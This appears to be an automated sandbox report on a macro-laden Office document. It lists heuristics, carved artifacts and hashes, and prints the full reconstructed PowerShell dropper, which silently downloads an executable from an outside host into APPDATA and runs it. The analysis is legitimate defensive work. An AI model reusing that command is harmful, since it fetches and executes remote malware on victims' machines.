Malware Insights
The critical heuristic OLE_VBA_SHELL indicates that the VBA macro executes a command using Shell(). The VBA script reconstructs a PowerShell command that downloads a file named 'jogb.exe' from 'http://ddl8.data.hu/get/283078/131252545/jogb.exe' and saves it as 'Mvfxbtw.exe' in the APPDATA directory, then executes it. The document body displays fake error messages to mask the malicious activity. The reconstructed PowerShell command is: powershell -nop -w hidden -c "IEX (New-Object System.Net.WebClient).DownloadFile('http://ddl8.data.hu/get/283078/131252545/jogb.exe', '$env:APPDATA\Mvfxbtw.exe') ; Start-Process ($env:APPDATA\Mvfxbtw.exe)". The script also creates and executes a batch file named 'tsthmltijsrxpqhupoz.bat'.
Heuristics 2
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA project inside OOXML medium OOXML_VBADocument contains vbaProject.bin — VBA macros present
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basc5b6b05c2259ebfacb3dff10ab45fae7a3ab700306091f9ddc5099e0f0a0f330 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2408 bytes |
vbaProject_00.bin04c55024adf67063227be5afb4d9b4a287c6878c07d27c4573215ffa51cec311 |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6144 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.